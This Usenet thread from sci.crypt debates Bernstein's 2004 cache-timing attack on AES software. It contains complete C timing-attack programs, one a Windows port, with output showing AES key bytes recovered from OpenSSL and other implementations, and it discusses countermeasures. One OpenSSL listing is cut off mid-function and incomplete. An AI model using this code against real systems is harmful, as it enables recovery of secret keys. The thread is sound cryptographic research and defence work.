---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago
Oh !! I'm very happy to be one of the first reading such a awesome
affirmation :-)
I'm afraid it will re-activate the debat few thread ago about "RC4 is not
secure, AES is secure :-)"
Please could you detail what does it change "in practice" for AES users ?
Arnaud
I've implemented your algo and got
b = 0, loops = 1024 79 22 134 157 179 174 41 242 217 86
b = 1, loops = 1024 165 243 71 220 200 98 206 224 72 183
b = 2, loops = 1024 136 249 77 147 238 75 78 126 208 206
b = 3, loops = 1024 173 175 61 19 141 173 203 161 114 223
b = 4, loops = 1024 219 111 39 202 206 100 129 119 10 60
b = 5, loops = 1024 64 92 163 92 144 21 154 136 131 23
b = 6, loops = 1024 218 147 228 193 232 97 60 229 228 229
b = 7, loops = 1024 6 129 81 224 108 145 44 252 32 140
b = 8, loops = 1024 190 16 30 211 238 64 235 231 29 76
b = 9, loops = 1024 211 47 71 78 87 63 67 18 40 181
b = 10, loops = 1024 232 107 14 55 158 68 234 253 86 192
b = 11, loops = 1024 31 143 206 106 47 126 159 177 54 110
b = 12, loops = 1024 234 114 124 22 217 162 203 189 145 62
b = 13, loops = 1024 208 72 100 200 119 78 34 123 144 130
b = 14, loops = 1024 134 250 191 171 186 208 151 4 197 33
b = 15, loops = 1024 215 158 18 58 208 43 81 208 180 143
On my AMD64 using LTC 0.99.
In particular for the noted bytes 1, 5, 9 it seems only that byte 5
really shows a "bias" of having 92 appear twice [probability iicc is
roughly 43.61/65536 or 0.000665479]
I don't quite get what you are trying to prove by this table [which
totally doesn't agree with your results]. A byte value that takes the
longest means what? There are 10 rounds in AES-128 and changing that
one byte will cause a difference in ALL 16 bytes after the second round
[compared to any other in the set].
I have put my source tarball for the demo at
http://libtomcrypt.org/djaes.tar.bz2
So far my initial assessment is the "bias" doesn't actually work or
isn't very practical.
Some things to note about my setup:
- Running Gentoo Linux on an 2.2Ghz AMD64
- Used GCC 3.4.2-r1
- Had gaim, xmms, mozilla, Xdvi, Apache2, sshd, Gnome and applets running
- Linked in LibTomCrypt 0.99 [with patchset 001] using the shared object
Maybe if I shut down all active processes and unniced it it would work
better who knows...
Tom
Question. Did you actually test his claim first?
> I'm afraid it will re-activate the debat few thread ago about "RC4 is not
> secure, AES is secure :-)"
RC4 *isn't* secure. If DJ is right than AES is not secure either.
One doesn't influence the other.
> Please could you detail what does it change "in practice" for AES users ?
Depends on if other can confirm the results. So far on my AMD64 it
doesn't work.
[Note: this isn't the first "break" of AES that didn't work and I doubt
it will be the last. Not to say that people trying is bad. Quite the
opposite it's good. Just jumping the bandwagon without checking it out
is bad.]
Tom
Some other comments about the paper
- Salsa10 isn't a block cipher so comparing it to AES is meaningless
- << and >> are **not** "cheap" as timing independent on 8-bit cpus
- He cites xtea/helix/sha256 as secure designs but doesn't prove or cite
proofs for this claim
- He fails to prove or state what Salsa10 is secure against
...
Tom
> Arnaud Carré wrote:
>
>> "D. J. Bernstein" <d...@cr.yp.to> a écrit dans le message de news:
>> slrncp7adr....@stoneport.math.uic.edu...
>>
>>> http://cr.yp.to/papers.html#cachetiming
>>
>> Oh !! I'm very happy to be one of the first reading such a awesome
>> affirmation :-)
>
>
> Question. Did you actually test his claim first?
>
>> I'm afraid it will re-activate the debat few thread ago about "RC4 is
>> not secure, AES is secure :-)"
>
>
> RC4 *isn't* secure. If DJ is right than AES is not secure either.
If I am reading this correctly, his claim is not that AES is insecure
but rather that particular _implementations_ of AES might be insecure
because they might leak key bits when subject to timing attacks.
Brian Gladman
More than that: I'm saying that _typical_ software implementations of
AES _do_ leak key bits to the simplest conceivable timing attack. The
underlying problem is that it's hard to do an S-box lookup in constant
time on modern CPUs.
I also did this separately and we seem to agree on what is involved.
I don't see the effect described in the paper either.
Brian Gladman
I don't see the attack as being practical and here is why.
Say you do two encryptions where you toggle byte k of the input [for
AES]. In round three, all bytes MUST be different between the two
16-byte blocks. It's then more plausible that they will "scatter"
throughout cache usage because all 16 bytes will now access different
parts of their respective 1kb arrays [though they could be on the same
page].
Also AES only requires 4KB of cache that is likely to be in L1 or L2
because it's adjacent. I'd hazard the guess that in most crypto
implementations on a cpu with enough cache for the OS + buffers + aes
that you're likely to not have that many cache misses after the first
few thousand blocks.
Not only that but you don't know when the cache miss occurs. Doesn't
tell you much about which lookups actually missed [because of the change
in input].
That and both myself and Brian cannot reproduce the results doesn't bode
well for the attack. Perhaps you could post your source code that you
ran and we can check either we implemented it wrong or you described it
wrong?
Tom
Yes, I agree that your claims are much wider than my comment here suggested.
But my aim in making a response to what Tom said was not to comment on
these wider issues but simply to avoid any suggestion that you are
claiming that the AES _algorithm_ is insecure when considered at an
abstract level.
Brian Gladman
My AES code was derived from the PD code by the Rijndael team that most
other sources use [GPG for instance uses it]. So unless D.J. found a
significantly new way to implement AES I suspect that he too uses the
same style implementation.
Also if his intention was to suggest that implementations ought to
tighten up then why would he propose Salsa10 as a "new methodology"?
I'm forming my own opinions on his motivations but I'll wait to see if
he'll post his test code before sharing them :-)
Tom
> BRG wrote:
>
>> D. J. Bernstein wrote:
>>
[snip]
> My AES code was derived from the PD code by the Rijndael team that most
> other sources use [GPG for instance uses it]. So unless D.J. found a
> significantly new way to implement AES I suspect that he too uses the
> same style implementation.
I have now run the tests using Paulo Barreto's AES code (this code was
used by DJB) as well as my own. I have done this on both Intel P3 and
P4 systems and cannot reproduce the results.
> Also if his intention was to suggest that implementations ought to
> tighten up then why would he propose Salsa10 as a "new methodology"?
>
> I'm forming my own opinions on his motivations but I'll wait to see if
> he'll post his test code before sharing them :-)
I remain to be convinced that this is as serious as DJB is suggesting.
Brian Gladman
Perhaps your variable alignments were lucky and avoided any overlaps in
the L1 cache; this won't happen in a large cryptographic program but it
could happen in a small test program. The more basic point is that the
timings depend heavily on the exact program you use, the compiler, and
the CPU.
Here's an example of 24 key bits leaking to the same trivial timing
attack in a few seconds on a Pentium M. I took Barreto's code, made an
easy translation from C++ to C, and ran
gcc -o time time.c barreto.c -O2
./time < /dev/urandom
with gcc 2.95.4 under FreeBSD 4.10. Output excerpt:
0, 64 loops: 114 10 83 65 235 62 76 144 65 8 200 37 35 14 150 39
1, 64 loops: 139 166 138 2 96 216 189 169 169 125 55 218 84 94 42 72
2, 64 loops: 127 96 211 151 186 194 194 202 237 252 251 102 200 127 31 39
3, 64 loops: 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76
4, 64 loops: 156 40 14 13 77 174 249 86 120 170 205 160 159 226 39 16
5, 64 loops: 24 189 115 81 106 101 108 107 50 199 25 240 168 85 49 156
6, 64 loops: 245 30 229 163 236 172 75 205 141 42 133 150 42 235 37 43
7, 64 loops: 79 105 173 50 201 79 38 14 115 192 43 40 222 175 52 26
8, 64 loops: 158 132 69 14 101 145 114 203 173 150 245 37 173 138 145 115
9, 64 loops: 127 94 80 118 234 15 199 197 86 80 122 51 36 23 59 45
10, 64 loops: 234 216 130 220 147 184 114 215 104 129 201 58 104 209 11 233
11, 64 loops: 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75
12, 64 loops: 110 102 182 214 82 202 109 108 133 94 37 95 66 158 152 66
13, 64 loops: 233 152 14 158 36 30 133 127 28 145 42 105 238 3 88 70
14, 64 loops: 150 7 2 142 47 142 17 117 58 96 208 34 113 191 231 183
15, 64 loops: 73 73 73 73 73 73 73 73 73 73 73 73 73 73 73 73
The time.c program is shown below.
---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago
#include <stdio.h>
typedef struct { unsigned long t[2]; } timing;
#define timing_now(x) \
asm volatile(".byte 15;.byte 49" : "=a"((x)->t[0]),"=d"((x)->t[1]))
#define timing_diff(x,y) \
(((x)->t[0] - (double) (y)->t[0]) \
+ 4294967296.0 * ((x)->t[1] - (double) (y)->t[1]))
unsigned char expanded[176];
unsigned char out[16];
unsigned char key[16];
unsigned char in[16];
int cycles(void)
{
timing tstart;
timing tend;
int t;
do {
timing_now(&tstart);
aes_encrypt(out,in,expanded);
timing_now(&tend);
t = timing_diff(&tend,&tstart);
} while (t <= 0 || t >= 1500);
return t;
}
int loops = 1;
int bump(int b)
{
int i;
int j;
int x;
int xt;
int bestx;
int bestxt = 0;
for (x = 0;x < 256;++x) {
xt = 0;
for (i = 0;i < loops;++i) {
for (j = 0;j < 16;++j) in[j] = random() >> 16;
in[b] = x;
xt += cycles() + cycles() + cycles();
}
if (xt > bestxt) {
bestx = x;
bestxt = xt;
}
}
return bestx;
}
main()
{
int j;
int k;
int b;
for (loops = 4;loops <= 65536;loops *= 2) {
for (b = 0;b < 16;++b) {
printf("%d, %d loops:",b,loops);
for (k = 0;k < 16;++k) {
for (j = 0;j < 16;++j) key[j] = getchar();
aes_expand(expanded,key);
printf(" %d",bump(b) ^ key[b]);
fflush(stdout);
}
printf("\n");
}
}
return 0;
}
I am just a "random" programmer...
How much of a concern is this ?
I mean windows is multi threaded... all kinds of events happen all the time.
Doesn't this completely throw off all timings ?
Besides from that..... let's look at the following scenerio:
Computer 1 <-> Middle Man <-> Computer 2.
Now your the middle man...
You don't know what kind of hardware computer 1 and computer 2 are using...
Even if you did know you have no access to there timing etc...
How could you possible "crack" any protocol that is being used to
communicate
between Computer 1, Computer 2 and you in between lol.
I don't see it ;)
Can you ?
Bye,
Skybuck.
No. It adds a random-looking delay to some of the timings. The attacker
can simply ignore the unusually long timings. The attacker can also take
advantage of the delays to gain information about cache misses inserted
into the middle of the AES computation; this requires averaging over a
large number of timings, but it's doable.
> How could you possible "crack" any protocol that is being used to
> communicate between Computer 1, Computer 2 and you in between lol.
My paper cites the Brumley-Boneh paper ``Remote timing attacks are
practical,'' which you obviously need to read.
Do you happen to have link to a PDF document or html file ?
Bye,
Skybuck.
Often it tells you the corresponding key byte, because---for example---
the xor of those bytes, which is used as a round-1 S-box index, incurs
an L1 cache miss. If you know how the cache works and where the program
stores its variables, you can figure out which xor values will trigger
this behavior; or you can see the values from a trivial test, as I did.
% gcc -o time time.c -lssl -lcrypto -O2
% ./time < /dev/urandom
...
2, 32 loops: 98 98 98 98 98 98 98 98 98 98 85 98 98 98 98 98
...
10, 32 loops: 94 94 94 94 94 94 94 94 94 93 94 93 94 94 94 94
...
14, 32 loops: 217 85 85 85 85 85 85 85 85 85 85 85 85 85 85 85
The 98, 94, and 85 are rock-solid at 64 loops. As an example of compiler
dependence, omitting -O2 changes the constants to 86, 97, and 93.
Anyway, the complete time.c code appears below.
---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago
#include <stdio.h>
#include <openssl/aes.h>
typedef struct { unsigned long t[2]; } timing;
#define timing_now(x) \
asm volatile(".byte 15;.byte 49" : "=a"((x)->t[0]),"=d"((x)->t[1]))
#define timing_diff(x,y) \
(((x)->t[0] - (double) (y)->t[0]) \
+ 4294967296.0 * ((x)->t[1] - (double) (y)->t[1]))
AES_KEY expanded;
unsigned char out[16];
unsigned char key[16];
unsigned char in[16];
int cycles(void)
{
timing tstart;
timing tend;
int t;
do {
timing_now(&tstart);
AES_encrypt(in,out,&expanded);
int loops = 1;
AES_set_encrypt_key(key,128,&expanded);
Right. An AES oracle---a magic box that, given n, prints AES_k(n)
exactly one time step later---is, as far as we know, indistinguishable
from an oracle for a uniform random permutation.
The problem is that real-world S-box lookups don't take constant time,
so real-world AES software doesn't take exactly one time step.
The paper spends a couple of pages explaining how expensive it is to
avoid the four most obvious sources of variability in S-box timing. If
you ever manage to write an AES implementation that doesn't have
input-dependent timings, feel free to tell us exactly how slow it is.
> then why would he propose Salsa10 as a "new methodology"?
I didn't call it a ``new methodology.'' In fact, I said quite clearly
that it follows TEA and SHA-256 and Helix. Of course, the 64-byte output
is different, and various details are different; the objective, as
usual, is to find the highest-speed system that we can still reasonably
conjecture to be unbreakable.
>Tom St Denis wrote:
>> A byte value that takes the longest means what?
>
>Often it tells you the corresponding key byte, because---for example---
>the xor of those bytes, which is used as a round-1 S-box index, incurs
>an L1 cache miss. If you know how the cache works and where the program
>stores its variables, you can figure out which xor values will trigger
>this behavior; or you can see the values from a trivial test, as I did.
I can see that S-boxes do have a potential of allowing side attacks,
given what you say here, although in some applications the attacker
doesn't have this opportunity, and only sees the enciphered messages.
But not using S-boxes, and depending entirely on functions that can be
calculated quickly, is very likely to create cryptanalytically
exploitable weaknesses in ciphers.
Security is not enhanced if so many conditions are set on what
constitutes an acceptable cipher that it becomes too difficult for
anyone ever to design one that is secure. If ciphers are only designed
for us by the high priests of mathematics, then we are forced to trust
them.
The first rule of security is to trust no one.
For some purposes, a cipher is needed that resists all side attacks. For
others, this is not a requirement. As long as the restrictions applying
to each class of cipher are recognized, a toolkit for the construction
of basic class ciphers by people wishing to communicate by E-mail,
concerned only about distant eavesdroppers, so that they can construct
their very own cipher, may serve a purpose.
Finding ciphers using just multiplication for nonlinearity is also a
valid pursuit, because applications exist requiring side attack
resistance. But the idea that there should only be one cipher, and it
should be all things to all men, is not a good one; Terry Ritter made
valid points about the dangers of staying with the herd (although the
dangers of going too far astray, and using a cipher about whose security
nothing is known, are also valid).
John Savard
http://home.ecn.ab.ca/~jsavard/index.html
> Here's another example. The same easy timing attack, applied to OpenSSL
> under FreeBSD 4.10 on a Pentium M, immediately finds 24 AES key bits:
>
> % gcc -o time time.c -lssl -lcrypto -O2
> % ./time < /dev/urandom
> ...
> 2, 32 loops: 98 98 98 98 98 98 98 98 98 98 85 98 98 98 98 98
> ...
> 10, 32 loops: 94 94 94 94 94 94 94 94 94 93 94 93 94 94 94 94
> ...
> 14, 32 loops: 217 85 85 85 85 85 85 85 85 85 85 85 85 85 85 85
>
> The 98, 94, and 85 are rock-solid at 64 loops. As an example of compiler
> dependence, omitting -O2 changes the constants to 86, 97, and 93.
> Anyway, the complete time.c code appears below.
Thank you for the code. I have had to modify this for Windows and
Microsoft VC++ (7.1) and my revision is included below for those who
might want to try this out.
After trying various combinations of AES tables I have not been able to
obtain any effects on either Intel P4 or VIA C3 processors.
But I have now found combinations of tables (using my AES code) that do
demonstrate the effect on the Intel P3 processor. Here is one P3 result
(the far right hand value is the duplicate count from 16 samples):
08, 00004 loops : 14 18 1f 37 3a 45 4d 4d 65 7c 8f a3 c8 e7 eb f7
11, 00004 loops : 18 18 22 3a 3a 3a 3a 3a 3a 41 48 84 ae c5 d7 e8 6
12, 00004 loops : 1d 1d 27 37 38 3b 3d 5e 5e 91 a2 ac b0 bd ce d4
01, 00008 loops : 2a 49 49 4b 74 77 7d 8d 91 9d 9f a8 da db f7 fb
05, 00008 loops : 07 2c 3c 46 51 58 5a 77 79 92 92 9e cd ec fc fe
08, 00008 loops : 03 13 17 17 2e 46 69 6c 76 80 8f 95 b3 e2 e6 f6
10, 00008 loops : 0f 10 16 33 3a 45 52 72 72 86 9c a3 c8 d5 f5 fa
11, 00008 loops : 3a 3a 40 68 81 9c a8 b6 c9 cf d0 d9 da ea ea f5
12, 00008 loops : 31 3c 4d 7e 81 90 99 a2 b4 b4 c5 c6 c8 c8 d1 ec
00, 00016 loops : 13 14 26 2a 37 48 52 6a 76 92 b5 c4 d6 fa fb fb
01, 00016 loops : 08 0c 2f 32 33 3e 4c 52 52 62 65 8e 9b aa ae ec
03, 00016 loops : 07 3c 47 55 67 68 7c 9c a1 d1 d6 ed f2 f8 f8 fa
04, 00016 loops : 05 05 05 0c 14 18 25 29 45 48 49 59 81 96 b0 c2 3
11, 00016 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 67 9c c6 f7 12
13, 00016 loops : 0a 69 69 6b 73 78 8e a2 af b4 bd c6 d2 dd ee ef
15, 00016 loops : 19 2e 35 3e 3e 44 46 52 8f 90 a2 b3 c4 e7 ed f0
01, 00032 loops : 1e 40 54 57 5d 6d a6 a7 b4 b8 b8 d5 d9 ee f0 fe
06, 00032 loops : 09 17 31 46 52 72 78 96 97 a2 b7 df e0 e0 ef fb
11, 00032 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 63 74 a0 bd d6 11
15, 00032 loops : 0e 1b 2c 35 3e 3e 3e 3e 59 63 77 83 88 94 b5 df 4
01, 00064 loops : 5e 6a 7e 7f 85 86 8b 8f 9f 9f a2 a5 d5 d9 df f7
07, 00064 loops : 05 10 15 17 2d 5f 6f 71 8b 91 ba c3 d4 ef ef fd
11, 00064 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 7e c1 c4 13
12, 00064 loops : 18 19 19 34 34 37 58 58 85 a3 a5 af ce dc df ee
15, 00064 loops : 0f 1c 24 31 3e 3e 3e 3e 56 63 65 7a 80 8e de e3 4
00, 00128 loops : 00 1b 21 45 4d 5c 60 84 96 9e 9e a6 bc cd db f7
01, 00128 loops : 0a 21 62 72 7d 8d 8d 8f 93 af b0 c5 d8 e1 e2 fc
02, 00128 loops : 01 2b 33 37 49 4a 4e 50 53 93 a0 dc ea ea ed f2
03, 00128 loops : 08 18 19 1b 24 2e 31 3a 3d 50 5e 85 ad c9 f8 f8
06, 00128 loops : 26 26 2a 37 59 5c 7c 7e a0 ba c5 c8 e2 e6 f1 fa
07, 00128 loops : 2e 37 4b 5d 70 72 75 87 9e a5 bd c5 c5 d8 e7 fe
09, 00128 loops : 2b 33 4b 4b 53 54 59 5f 70 70 92 94 97 98 af f9
10, 00128 loops : 2d 2e 4e 53 60 64 8d 91 a1 a1 b3 c2 e0 ed f9 ff
11, 00128 loops : 0e 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 8f bf c0 12
14, 00128 loops : 05 05 08 3b 4f 5d 69 6a 7a 8c ab cc ef ef f0 f8
15, 00128 loops : 07 13 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 8d 98 e4 f4 10
03, 00256 loops : 36 40 51 6b 75 8b 8b 98 a1 ac b5 e6 ec f3 fa fc
04, 00256 loops : 0a 16 30 50 65 6f 71 79 94 a2 a6 d2 d2 db e5 fd
05, 00256 loops : 02 08 17 17 1d 42 50 6a 84 c6 d8 dc e5 f6 f8 f9
06, 00256 loops : 1e 22 2c 44 51 5a 64 87 8b 9e a0 a0 b0 bc e3 ff
09, 00256 loops : 25 27 27 58 5c 84 9b 9f a9 de e2 e8 ee f2 f7 fa
11, 00256 loops : 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 5c 96 96 13
13, 00256 loops : 02 30 46 49 4e 58 7a 7e 89 95 a1 a3 a3 b0 dc ef
14, 00256 loops : 2c 32 32 3c 3d 4b 61 8b 92 b1 c2 e0 e9 eb ed ef
15, 00256 loops : 2f 3d 3e 3e 3e 3e 3e 3e 3e 3e 3e 6e 74 c6 e2 ea 9
02, 00512 loops : 04 11 38 65 70 75 7e 97 a5 ba ba dc dd e6 fd fe
04, 00512 loops : 0e 0e 38 44 56 66 67 6b 80 a9 aa bd bd ca d4 d7
05, 00512 loops : 01 3b 46 4b 59 66 6f 84 85 89 99 be c6 c7 d5 d5
08, 00512 loops : 07 18 1c 27 27 2a 4a 4b 64 72 8b 93 aa d4 e1 e5
11, 00512 loops : 11 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 67 14
14, 00512 loops : 1c 29 2f 4f 5c 60 6c 7c 83 83 a0 a5 c3 dd f4 f8
15, 00512 loops : 22 34 36 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 73 9b b5 10
Brian Gladman
-------------------------------------
/* Based on D. J. Bernstein's Timing Attack Code modified for
Brian Gladman's AES code and Microsoft VC++ version 7.1
*/
#include <stdio.h>
#include <stdlib.h>
#include "aes.h"
/* obtain cycle counts using the Time Stamp Counter */
#define timing_now(x) \
__asm rdtsc __asm lea ebx,x __asm mov [ebx],eax __asm mov [ebx+4],edx
#define timing_diff(x,y) (int)(x - y)
#define N_SAMPLES 16
unsigned char out[16];
unsigned char key[16];
unsigned char in[16];
aes_encrypt_ctx ctx[1];
/* Simple PRNG combining 2 of George Marsaglia's generators */
unsigned long rand32(void)
{ static unsigned long w = 521288629, z = 362436069;
z = 36969 * (z & 65535) + (z >> 16);
w = 18000 * (w & 65535) + (w >> 16);
return (z << 16) + w;
}
unsigned char rand8(void)
{ static unsigned long r4, cnt = 4;
if(cnt == 4)
r4 = rand32(), cnt = 0;
return (unsigned char)(r4 >> 8 * cnt++);
}
int cycles(void)
{ unsigned long long tstart, tend;
int t;
do
{ timing_now(tstart);
aes_encrypt(in, out, ctx);
timing_now(tend);
t = timing_diff(tend, tstart);
}
while
(t <= 0 || t >= 1500);
return t;
}
int bump(int b, int loops)
{ int i, j, x, xt, bestx, bestxt = 0;
for(x = 0; x < 256; ++x)
{ xt = 0;
for(i = 0; i < loops; ++i)
{
for(j = 0; j < 16; ++j)
in[j] = rand8();
in[b] = x;
xt += cycles() + cycles() + cycles();
}
if(xt > bestxt)
{
bestx = x; bestxt = xt;
}
}
return bestx;
}
int cmp(const unsigned char* a, const unsigned char* b)
{
return *a < *b ? -1 : *a > *b ? 1 : 0;
}
int main(void)
{ int i, j, k, b, loops, cnt;
unsigned char v[16];
for(loops = 4; loops <= 65536; loops += loops)
{ for(b = 0; b < 16; ++b)
{ for(k = 0; k < N_SAMPLES; ++k)
{ for(j = 0; j < 16; ++j)
key[j] = rand8();
aes_encrypt_key(key, 16, ctx);
v[k] = bump(b, loops) ^ key[b];
}
qsort(v, N_SAMPLES, sizeof(unsigned char), cmp);
j = 0; cnt = 0;
do
{ if(v[j] == v[j + 1])
{ k = j;
while(++j < N_SAMPLES && v[j] == v[k])
;
cnt = (j - k > cnt ? j - k : cnt);
--j;
}
}
while
(++j < N_SAMPLES);
if(cnt > 1)
{ printf("\n%02d, %05d loops :", b, loops);
for(i = 0; i < N_SAMPLES; ++i)
printf(" %02x", v[i]);
if(cnt > 2)
printf(" %2d", cnt);
fflush(stdout);
}
}
}
return 0;
}
I found a string of "243" with his code [slightly modified to be more
x86 portable asm...] in byte 1, but when I put in my rdtsc function
[from my djaes code] I got strings of 245. So clearly what value that
pops out is dependent on the analysis software cuz both can't be right.
So the question now is why doesn't my AES code leak bytes too? My code
is fairly fast [17 cycles/byte on an AMD64] for C code and is based off
the Rijndael teams "fast-alg" code.
I'm going to look at the SSL AES code and see if I can spot major
differences.
Tom
> http://cr.yp.to/papers.html#cachetiming
Interesting.
When you say that you 'reliably' leak 24 bits (bytes 1,5,9)
the third byte isn't 100% reliable, having 2 non-135 values.
I notice that the lowest bit of byte 0 is 0 for all but 2
of the values in your table. Is that statistically significant,
and if so would you consider it equally fair to say that that
particular implementation reliably leaked 25 bits, not 24?
(And by extension, some of the implementations that appear
to be leaking fewer bits might also be leaking more than they
first appear to.)
Is there any reason why AES implementations shouldn't also be
capable of leaking relations between bits even if they don't
leak explicit bits?
Phil
--
They no longer do my traditional winks tournament lunch - liver and bacon.
It's just what you need during a winks tournament lunchtime to replace lost
... liver. -- Anthony Horton, 2004/08/27 at the Cambridge 'Long Vac.'
> BRG wrote:
[snip]
>>
>>
>> Thank you for the code. I have had to modify this for Windows and
>> Microsoft VC++ (7.1) and my revision is included below for those who
>> might want to try this out.
>>
>> After trying various combinations of AES tables I have not been able
>> to obtain any effects on either Intel P4 or VIA C3 processors.
>
> I found a string of "243" with his code [slightly modified to be more
> x86 portable asm...] in byte 1, but when I put in my rdtsc function
> [from my djaes code] I got strings of 245. So clearly what value that
> pops out is dependent on the analysis software cuz both can't be right.
>
> So the question now is why doesn't my AES code leak bytes too? My code
> is fairly fast [17 cycles/byte on an AMD64] for C code and is based off
> the Rijndael teams "fast-alg" code.
Since most fast AES software works in a similar way, it is unlikely that
the effect is present in some implementations and not in others.
But the effect is very dependent on setting up the AES tables in a way
that invokes specific cache behaviour.
If timing attacks are a concern, much smaller tables can be used. I
don't see the effect on any processors when AES is implemented with
small tables (this reduces the speed by a factor of about 2).
Brian Gladman
salsa10 looks like an improved version of slash [**], with
better parallelizability of operations, and less operations (5/8);
also notable are a "butterfly" diffusion schedule, and more
irregular structure (randomized rotation constants, randomized
choice between add-then-xor or xor-then-add, and an additive
value that changes across rounds).
I guess DJB has some theory, or at least justifiable rule of
thumb, to decide the number of operations. Designers of SHA-x faced
the same issue. But neither had the gu^K^K^K imprudence to state it.
Any pointer to solid theory on the security level of this sort
of construct. e.g., most importantly, the effect of the number
of operations on differential/linear/impossible/unamit cryptanalysis?
And/or on the need for some amount of irregularity in the structure?
TIA,
Francois Grieu
[*] Daniel J. Bernstein: Cache-timing attacks on AES
<http://cr.yp.to/antiforgery.html#cachetiming>
<http://cr.yp.to/antiforgery/cachetiming-20041111.pdf>
[**] post on sci.crypt.research circa 2004-09-07
article <2q4o33F...@uni-berlin.de>
<http://google.com/groups?as_umsgid=2q4o33F...@uni-berlin.de>
salsa10 looks like an improved version of slash [2], with
better parallelizability of operations, and less operations (5/8);
also notable are a "butterfly" diffusion schedule, and more
irregular structure (randomized rotation constants, randomized
choice between add-then-xor or xor-then-add, and an additive
value that changes across rounds).
I guess DJB has some theory, or at least justifiable rule of
thumb, to decide the number of operations. Designers of SHA-x faced
the same issue. But neither had the gu^K^K^K imprudence to state it.
Any pointer to solid theory on the security level of this sort
of construct. e.g., most importantly, the effect of the number
of operations on differential/linear/impossible/unamit cryptanalysis?
And/or on the need for some amount of irregularity in the structure?
TIA,
Francois Grieu
[1] Daniel J. Bernstein: Cache-timing attacks on AES
<http://cr.yp.to/antiforgery.html#cachetiming>
<http://cr.yp.to/antiforgery/cachetiming-20041111.pdf>
[2] post on sci.crypt.research circa 2004-09-07
article <2q4o33F...@uni-berlin.de>
<http://google.com/groups?as_umsgid=2q4o33F...@uni-berlin.de>
True. But the 135 becomes solid when the number of loops increases.
> I notice that the lowest bit of byte 0 is 0 for all but 2
> of the values in your table. Is that statistically significant,
Could be random. I didn't look for (and am not planning to look for)
further patterns; 24 leaked key bits is already unacceptable.
If you want to try extracting the entire key, you could look for more
patterns in the timings, or you could arrange for different sets of
variables to be touched before the AES call.
So? If you can get your hands to the physical computer and software that
is running it, you can get the key anyway (read it from the memory
etc.). Ofcourse you have to do the actual encryptions in secure
enviroment, because if you cant control the computer that runs them, you
are screwed anyway.
--
My computer security & privacy related homepage
http://www.markusjansson.net
Use HushTools or GnuPG/PGP to encrypt any email
before sending it to me to protect our privacy.
The attack doesn't read the key from memory. What it reads is the time
taken to compute AES_k(n) for selected values of n. It easily figures
out some key bytes from those timings.
Is there any impact on this approach working on systems with more than
one processor (SMP or dual core) or with "virtual CPUs" (hyperthreading)
as opposed to a conventional UP system? How about the effects of other
application loads on a multitasking system impacting the results?
--
Randy Howard (2reply remove FOOBAR)
I ran the time.c program along with the 6 AES implementations present in
aesbench.tgz (devine, gladman, mks, openssl, gpg, tom), on several
machines, one of them is a dual Celeron 560. Patterns also appear on this
machine.
The "worst" case was the "devine" implementation on a Pentium III. 50% of
the key bytes showed a repetitive pattern.
--
Erwann ABALEA <erw...@abalea.com> - RSA PGP Key ID: 0x2D0EABD5
-----
ED> >:)
T'utilise des rires enregistrés (c)... T'es *vraiment* un dinosaure?
J'ai un doute...
-+-RG: Guide du Neueu Usenet-La prudence est le début de la sagesse-+-
Does anyone have any estimates for how many queries might be required?
It all comes down to the S/N ratio; does anyone have any information on
how large a bias the timing variability causes?
Does anyone know of an example of an AES implementation that can be
compromised in this way by a remote attacker on the other side of a
wide-area network link?
Does anyone know whether one can implement AES efficiently using a
bitslice (or similar) strategy?
By the way, one way to compute the AES S-box in constant time is by
raising the input to the 254th power in GF(2^8), using constant-time
subroutines for squaring and multiplication. I think I first saw this
idea in a paper by Bloemer et al in SAC 2004.
AES can be implemented without tables but it is very slow comapred to
the normal methods. But it can also be implemented with quite small
tables at about half normal speed and I have not seen any timing
anomalies in this implementation.
Brian Gladman
By "quite small", do you mean an 8-bit to 8-bit table
(e.g., for inversion in GF(2^8))? Or do you perhaps mean
the trick by which inversion in GF(2^8) can be expressed as
a few operations in GF(2^4), which I presume could be expressed
with 4-bit tables?
>It seems that the design of constant-time algorithms depends on
>the implementation platform. On some 8-bit embedded processors,
>data-dependent shifts and rotates are not constant-time, while AES
>S-box computations may well be constant-time (whether due to the lack
>of cache, or to other strategies for evaluating the AES S-box without
>table lookups).
This is very true.
John Savard
http://home.ecn.ab.ca/~jsavard/index.html
Good question. Someone should setup a challenge server that acts as a
random oracle to test this problem.
Tom
I did think about these options but the one I was specifically thinking
of is different as all of these options are very slow in software.
The normal AES implementations use large tables of 4096 bytes each and
can have up to 4 such tables with a total table byte count of up to
16384 bytes (half this for encryption only). This puts a lot of
pressure on the cache in some machines and it is this that the timing
attack is able to exploit.
But AES can be implemented at about half maximum speed with two tables
each of 1024 bytes (or only 1024 bytes for encryption alone). While
this won't completely eliminate timing issues it is not pressing the
cache anywhere near as hard and will therefore be far less likely to be
easily exploitatble.
It was this option that I had in mind. I have run DJB's timing attack on
this code in a P3 - where the attack works for large tables - and was
unable to see any timing effects with his code.
Brian Gladman
Thanks for the report.
> The "worst" case was the "devine" implementation on a Pentium III. 50%
> of the key bytes showed a repetitive pattern.
You shouldn't compare implementations based on how badly they flunk this
very simple test. Even if you don't take the serious cryptographer's
attitude that leaking a single key byte is a disaster, you should assume
that slightly more sophisticated attacks will obtain all the key bits.
This is certainly an issue for RC6, although it doesn't bother me as
much as the lack of key agility in RC6.
> By the way, one way to compute the AES S-box in constant time is by
> raising the input to the 254th power in GF(2^8), using constant-time
> subroutines for squaring and multiplication. I think I first saw this
> idea in a paper by Bloemer et al in SAC 2004.
http://cr.yp.to/talks.html#2001.10.29, page 20, specifically identifies
input-independent timings as an advantage of this reciprocal strategy.
(I'm citing the Bloemer paper for other reasons.)
Thanks for pointing that out. I hadn't seen that before. I appreciate
the reference. I'll update my notes.
